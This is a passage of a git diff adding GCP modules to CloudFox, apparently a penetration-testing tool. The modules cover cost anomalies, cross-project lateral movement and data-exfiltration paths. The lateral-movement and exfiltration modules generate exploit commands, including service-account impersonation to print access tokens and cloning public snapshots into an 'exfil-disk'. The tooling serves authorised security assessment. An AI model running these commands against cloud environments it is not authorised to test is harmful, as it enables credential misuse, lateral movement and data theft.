stopped but still provisioned instances (still incur storage costs) + if instance.State == "SUSPENDED" { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "idle", + Severity: "MEDIUM", + Details: "Cloud SQL instance is suspended but still incurs storage costs", + Location: instance.Region, + Remediation: "Consider deleting if not needed, or start if needed for operations", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for high-tier instances without labels + if instance.Settings != nil && strings.Contains(instance.Settings.Tier, "db-custom") { + if instance.Settings.UserLabels == nil || len(instance.Settings.UserLabels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: fmt.Sprintf("High-tier Cloud SQL instance (%s) has no cost allocation labels", instance.Settings.Tier), + Location: instance.Region, + Remediation: fmt.Sprintf("gcloud sql instances patch %s --update-labels=cost-center=UNKNOWN,owner=UNKNOWN", instance.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate storage buckets in project %s", projectID)) + return + } + + for _, bucket := range buckets.Items { + // Check for buckets without labels + if len(bucket.Labels) == 0 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Storage bucket has no cost allocation labels", + Location: bucket.Location, + Remediation: fmt.Sprintf("gsutil label ch -l cost-center:UNKNOWN gs://%s", bucket.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for multi-regional buckets with nearline/coldline (unusual pattern) + if bucket.StorageClass == "NEARLINE" || bucket.StorageClass == "COLDLINE" { + if strings.Contains(strings.ToUpper(bucket.Location), "DUAL") || len(bucket.Location) <= 4 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "suboptimal-config", + Severity: "LOW", + Details: fmt.Sprintf("Multi-regional bucket with %s storage (consider single region for cost)", bucket.StorageClass), + Location: bucket.Location, + Remediation: "Consider using single-region buckets for archival storage", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *CostSecurityModule) extractMachineTypeName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *CostSecurityModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) parseMachineType(machineType string) (vcpus int64, memGB float64) { + // Common machine type patterns + // n1-standard-4: 4 vCPUs, 15 GB + // e2-medium: 2 vCPUs, 4 GB + // custom-8-32768: 8 vCPUs, 32 GB + + switch { + case strings.HasPrefix(machineType, "custom-"): + // Parse custom machine type + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[1], "%d", &vcpus) + var memMB int64 + fmt.Sscanf(parts[2], "%d", &memMB) + memGB = float64(memMB) / 1024 + } + case strings.HasPrefix(machineType, "n1-"): + vcpuMap := map[string]int64{ + "n1-standard-1": 1, "n1-standard-2": 2, "n1-standard-4": 4, + "n1-standard-8": 8, "n1-standard-16": 16, "n1-standard-32": 32, + "n1-standard-64": 64, "n1-standard-96": 96, + "n1-highmem-2": 2, "n1-highmem-4": 4, "n1-highmem-8": 8, + "n1-highmem-16": 16, "n1-highmem-32": 32, "n1-highmem-64": 64, + "n1-highcpu-2": 2, "n1-highcpu-4": 4, "n1-highcpu-8": 8, + "n1-highcpu-16": 16, "n1-highcpu-32": 32, "n1-highcpu-64": 64, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 3.75 // Standard ratio + case strings.HasPrefix(machineType, "e2-"): + vcpuMap := map[string]int64{ + "e2-micro": 2, "e2-small": 2, "e2-medium": 2, + "e2-standard-2": 2, "e2-standard-4": 4, "e2-standard-8": 8, + "e2-standard-16": 16, "e2-standard-32": 32, + "e2-highmem-2": 2, "e2-highmem-4": 4, "e2-highmem-8": 8, + "e2-highmem-16": 16, + "e2-highcpu-2": 2, "e2-highcpu-4": 4, "e2-highcpu-8": 8, + "e2-highcpu-16": 16, "e2-highcpu-32": 32, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 4 // Approximate + case strings.HasPrefix(machineType, "n2-") || strings.HasPrefix(machineType, "n2d-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + case strings.HasPrefix(machineType, "c2-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + default: + vcpus = 2 + memGB = 4 + } + + return vcpus, memGB +} + +func (m *CostSecurityModule) estimateInstanceCost(machineType string, vcpus int64, memGB float64, gpuCount int) float64 { + // Rough monthly estimates based on on-demand pricing in us-central1 + // Actual costs vary by region and commitment + + baseCost := float64(vcpus)*25 + memGB*3 // Rough per-vCPU and per-GB costs + + // GPU costs (rough estimates) + if gpuCount > 0 { + baseCost += float64(gpuCount) * 400 // ~$400/month per GPU + } + + // Adjust for machine type efficiency + if strings.HasPrefix(machineType, "e2-") { + baseCost *= 0.7 // E2 is cheaper + } else if strings.HasPrefix(machineType, "c2-") { + baseCost *= 1.2 // C2 is more expensive + } + + return baseCost +} + +func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) float64 { + // Rough monthly estimates per GB + // pd-standard: $0.04/GB, pd-ssd: $0.17/GB, pd-balanced: $0.10/GB + + pricePerGB := 0.04 + if strings.Contains(diskType, "ssd") { + pricePerGB = 0.17 + } else if strings.Contains(diskType, "balanced") { + pricePerGB = 0.10 + } + + return float64(sizeGB) * pricePerGB +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CostSecurityModule) initializeLootFiles() { + m.LootMap["cost-security-commands"] = &internal.LootFile{ + Name: "cost-security-commands", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main cost-security table (combines cryptomining, orphaned, and anomalies) + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators + for _, c := range m.Cryptomining { + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources + for _, o := range m.Orphaned { + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies + for _, a := range m.CostAnomalies { + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + + // Add remediation to loot + if a.Remediation != "" { + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n# %s\n%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, a.ProjectID, a.Details, a.Remediation, + ) + } + } + + // Expensive Resources table (keep separate due to different structure) + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Review before executing!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security-expensive", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + output := CostSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go new file mode 100644 index 00000000..c25e9e01 --- /dev/null +++ b/gcp/commands/crossproject.go @@ -0,0 +1,468 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + crossprojectservice "github.com/BishopFox/cloudfox/gcp/services/crossProjectService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCrossProjectCommand = &cobra.Command{ + Use: globals.GCP_CROSSPROJECT_MODULE_NAME, + Aliases: []string{"cross-project", "xproject", "lateral"}, + Short: "Analyze cross-project access patterns for lateral movement", + Long: `Analyze cross-project IAM bindings to identify lateral movement paths. + +This module is designed for penetration testing and identifies: +- Service accounts with access to multiple projects +- Cross-project IAM role bindings +- Potential lateral movement paths between projects + +Features: +- Maps cross-project service account access +- Identifies high-risk cross-project roles (owner, editor, admin) +- Generates exploitation commands for lateral movement +- Highlights service accounts spanning trust boundaries + +Risk Analysis: +- CRITICAL: Owner/Editor/Admin roles across projects +- HIGH: Sensitive admin roles (IAM, Secrets, Compute) +- MEDIUM: Standard roles with cross-project access +- LOW: Read-only cross-project access + +WARNING: Requires multiple projects to be specified for effective analysis. +Use -p for single project or -l for project list file.`, + Run: runGCPCrossProjectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CrossProjectModule struct { + gcpinternal.BaseGCPModule + + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CrossProjectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CrossProjectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CrossProjectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CROSSPROJECT_MODULE_NAME) + if err != nil { + return + } + + if len(cmdCtx.ProjectIDs) < 2 { + cmdCtx.Logger.InfoM("Cross-project analysis works best with multiple projects. Consider using -l to specify a project list.", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + module := &CrossProjectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CrossBindings: []crossprojectservice.CrossProjectBinding{}, + CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, + LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + svc := crossprojectservice.New() + + // Analyze cross-project bindings + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not analyze cross-project access") + } else { + m.CrossBindings = bindings + } + + // Get cross-project service accounts + sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not get cross-project service accounts") + } else { + m.CrossProjectSAs = sas + } + + // Find lateral movement paths + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find lateral movement paths") + } else { + m.LateralMovementPaths = paths + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 { + logger.InfoM("No cross-project access patterns found", globals.GCP_CROSSPROJECT_MODULE_NAME) + return + } + + // Count high-risk findings + criticalCount := 0 + highCount := 0 + for _, binding := range m.CrossBindings { + switch binding.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + m.addBindingToLoot(binding) + } + + for _, sa := range m.CrossProjectSAs { + m.addServiceAccountToLoot(sa) + } + + for _, path := range m.LateralMovementPaths { + m.addLateralMovementToLoot(path) + } + + logger.SuccessM(fmt.Sprintf("Found %d cross-project binding(s), %d cross-project SA(s), %d lateral movement path(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk cross-project bindings!", criticalCount, highCount), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CrossProjectModule) initializeLootFiles() { + m.LootMap["crossproject-exploit-commands"] = &internal.LootFile{ + Name: "crossproject-exploit-commands", + Contents: "# Cross-Project Exploit Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["crossproject-enum-commands"] = &internal.LootFile{ + Name: "crossproject-enum-commands", + Contents: "# Cross-Project Enumeration Commands\n# External/Cross-Tenant principals with access to your projects\n# Generated by CloudFox\n\n", + } +} + +func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { + // Add exploitation commands + if len(binding.ExploitCommands) > 0 { + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# %s -> %s (Principal: %s, Role: %s)\n", + binding.SourceProject, binding.TargetProject, binding.Principal, binding.Role, + ) + for _, cmd := range binding.ExploitCommands { + m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-exploit-commands"].Contents += "\n" + } + + // Check for cross-tenant/external access + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "# External Principal: %s\n"+ + "# Target Project: %s\n"+ + "# Role: %s\n", + binding.Principal, + binding.TargetProject, + binding.Role, + ) + + // External service accounts - add check command + if strings.Contains(binding.Principal, "serviceAccount:") { + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", + binding.TargetProject, + strings.TrimPrefix(binding.Principal, "serviceAccount:"), + ) + } + m.LootMap["crossproject-enum-commands"].Contents += "\n" + } +} + +// isCrossTenantPrincipal checks if a principal is from outside the organization +func isCrossTenantPrincipal(principal string, projectIDs []string) bool { + // Extract service account email + email := strings.TrimPrefix(principal, "serviceAccount:") + email = strings.TrimPrefix(email, "user:") + email = strings.TrimPrefix(email, "group:") + + // Check if the email domain is gserviceaccount.com (service account) + if strings.Contains(email, "@") && strings.Contains(email, ".iam.gserviceaccount.com") { + // Extract project from SA email + // Format: NAME@PROJECT.iam.gserviceaccount.com + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + saProject := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + + // Check if SA's project is in our project list + for _, p := range projectIDs { + if p == saProject { + return false // It's from within our organization + } + } + return true // External SA + } + } + + // Check for compute/appspot service accounts + if strings.Contains(email, "-compute@developer.gserviceaccount.com") || + strings.Contains(email, "@appspot.gserviceaccount.com") { + // Extract project number/ID + parts := strings.Split(email, "@") + if len(parts) == 2 { + projectPart := strings.Split(parts[0], "-")[0] + for _, p := range projectIDs { + if strings.Contains(p, projectPart) { + return false + } + } + return true + } + } + + // For regular users, check domain + if strings.Contains(email, "@") && !strings.Contains(email, "gserviceaccount.com") { + // Can't determine organization from email alone + return false + } + + return false +} + +func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { + // Add impersonation commands for cross-project SAs + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Cross-project SA: %s (Home: %s)\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sa.Email, sa.ProjectID, sa.Email, + ) +} + +func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { + // Add lateral movement exploitation commands + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Lateral Movement: %s -> %s\n"+ + "# Principal: %s\n"+ + "# Method: %s\n"+ + "# Target Roles: %s\n", + path.SourceProject, path.TargetProject, + path.SourcePrincipal, + path.AccessMethod, + strings.Join(path.TargetRoles, ", "), + ) + + if len(path.ExploitCommands) > 0 { + for _, cmd := range path.ExploitCommands { + m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + } + } + m.LootMap["crossproject-exploit-commands"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Cross-project bindings table + // Reads: Source principal from source project has role on target project + bindingsHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Principal", + "Source Principal Type", + "Action", + "Target Project Name", + "Target Project ID", + "Target Role", + "External", + } + + var bindingsBody [][]string + for _, binding := range m.CrossBindings { + // Check if external/cross-tenant + external := "No" + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + external = "Yes" + } + + // Action is always "direct IAM binding" for cross-project bindings + action := "direct IAM binding" + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.SourceProject), + binding.SourceProject, + binding.Principal, + binding.PrincipalType, + action, + m.GetProjectName(binding.TargetProject), + binding.TargetProject, + binding.Role, + external, + }) + } + + // Cross-project service accounts table + // Reads: Source SA from source project has access to target projects + sasHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Service Account", + "Action", + "Target Project Count", + "Target Access (project:role)", + } + + var sasBody [][]string + for _, sa := range m.CrossProjectSAs { + // Count unique target projects + projectSet := make(map[string]bool) + for _, access := range sa.TargetAccess { + parts := strings.Split(access, ":") + if len(parts) > 0 { + projectSet[parts[0]] = true + } + } + + // Action describes how the SA has cross-project access + action := "cross-project access" + + // Join target access with newlines for readability + accessList := strings.Join(sa.TargetAccess, "\n") + + sasBody = append(sasBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + action, + fmt.Sprintf("%d", len(projectSet)), + accessList, + }) + } + + // Lateral movement paths table + // Reads: Source principal from source project can move to target project via method + pathsHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Principal", + "Action", + "Target Project Name", + "Target Project ID", + "Target Roles", + } + + var pathsBody [][]string + for _, path := range m.LateralMovementPaths { + // Use access method as action (human-readable) + action := path.AccessMethod + + // Join roles with newlines for readability + roles := strings.Join(path.TargetRoles, "\n") + + pathsBody = append(pathsBody, []string{ + m.GetProjectName(path.SourceProject), + path.SourceProject, + path.SourcePrincipal, + action, + m.GetProjectName(path.TargetProject), + path.TargetProject, + roles, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + var tables []internal.TableFile + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + if len(sasBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-sas", + Header: sasHeader, + Body: sasBody, + }) + } + + if len(pathsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-paths", + Header: pathsHeader, + Body: pathsBody, + }) + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go new file mode 100644 index 00000000..ff4ce4d2 --- /dev/null +++ b/gcp/commands/dataexfiltration.go @@ -0,0 +1,641 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + storage "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" + +var GCPDataExfiltrationCommand = &cobra.Command{ + Use: GCP_DATAEXFILTRATION_MODULE_NAME, + Aliases: []string{"exfil", "data-exfil", "exfiltration"}, + Short: "Identify data exfiltration paths and high-risk data exposure", + Long: `Identify data exfiltration vectors and paths in GCP environments. + +Features: +- Finds public snapshots and images +- Identifies export capabilities (BigQuery, GCS) +- Maps Pub/Sub push endpoints (external data flow) +- Finds logging sinks to external destinations +- Identifies publicly accessible storage +- Analyzes backup export configurations +- Generates exploitation commands for penetration testing + +This module helps identify how data could be exfiltrated from the environment +through various GCP services.`, + Run: runGCPDataExfiltrationCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ExfiltrationPath struct { + PathType string // "snapshot", "bucket", "pubsub", "logging", "bigquery", "image" + ResourceName string + ProjectID string + Description string + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string + ExploitCommand string +} + +type PublicExport struct { + ResourceType string + ResourceName string + ProjectID string + AccessLevel string // "public", "allAuthenticatedUsers", "specific_domain" + DataType string // "snapshot", "image", "bucket", "dataset" + Size string + RiskLevel string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DataExfiltrationModule struct { + gcpinternal.BaseGCPModule + + ExfiltrationPaths []ExfiltrationPath + PublicExports []PublicExport + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DataExfiltrationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataExfiltrationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataExfiltrationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + return + } + + module := &DataExfiltrationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExfiltrationPaths: []ExfiltrationPath{}, + PublicExports: []PublicExport{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Identifying data exfiltration paths...", GCP_DATAEXFILTRATION_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + + // Check results + if len(m.ExfiltrationPaths) == 0 && len(m.PublicExports) == 0 { + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, p := range m.ExfiltrationPaths { + switch p.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s): %d CRITICAL, %d HIGH", + len(m.ExfiltrationPaths), len(m.PublicExports), criticalCount, highCount), GCP_DATAEXFILTRATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + // 1. Find public/shared snapshots + m.findPublicSnapshots(ctx, projectID, logger) + + // 2. Find public/shared images + m.findPublicImages(ctx, projectID, logger) + + // 3. Find public buckets + m.findPublicBuckets(ctx, projectID, logger) + + // 4. Find cross-project logging sinks + m.findLoggingSinks(ctx, projectID, logger) + + // 5. Analyze potential exfiltration vectors + m.analyzeExfiltrationVectors(ctx, projectID, logger) +} + +// findPublicSnapshots finds snapshots that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + // Get IAM policy for snapshot + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "disk_snapshot", + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public disk snapshot (%d GB)", snapshot.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"}, + ExploitCommand: fmt.Sprintf( + "# Create disk from public snapshot\n"+ + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a", + projectID, snapshot.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// findPublicImages finds images that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + // Get IAM policy for image + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + // Check for public access + 